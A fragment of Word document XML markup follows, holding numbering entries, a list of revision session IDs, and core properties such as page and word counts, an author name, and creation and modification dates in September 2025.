    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="141296575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37B7"/>
    <w:rsid w:val="00020BD0"/>
    <w:rsid w:val="00253BAB"/>
    <w:rsid w:val="002A7028"/>
    <w:rsid w:val="00307323"/>
    <w:rsid w:val="00371D38"/>
    <w:rsid w:val="004360AC"/>
    <w:rsid w:val="00537FA2"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006A0D64"/>
    <w:rsid w:val="0073301E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008931FC"/>
    <w:rsid w:val="008937B7"/>
    <w:rsid w:val="008C30FC"/>
    <w:rsid w:val="00986F87"/>
    <w:rsid w:val="009A7D08"/>
    <w:rsid w:val="00A81111"/>
    <w:rsid w:val="00AB7FD6"/>
    <w:rsid w:val="00AF5B61"/>
    <w:rsid w:val="00BE1B25"/>
    <w:rsid w:val="00BF66BE"/>
    <w:rsid w:val="00C213A3"/>
    <w:rsid w:val="00C31CAF"/>
    <w:rsid w:val="00D1115B"/>
    <w:rsid w:val="00DD1C9A"/>
    <w:rsid w:val="00E54363"/>
    <w:rsid w:val="00F32993"/>
    <w:rsid w:val="00FD2B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F9DFC4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2C6DBB19-D931-4696-B20B-7BC93ECF27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937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937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937B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937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937B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937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937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937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37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37B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937B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937B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937B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937B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937B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937B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937B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937B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937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937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937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937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937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937B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937B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937B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937B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937B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937B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</TotalTime>
  <Pages>4</Pages>
  <Words>370</Words>
  <Characters>2109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umar farooq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>umar farooq</cp:lastModifiedBy>
  <cp:revision>57</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-19T18:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-19T19:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>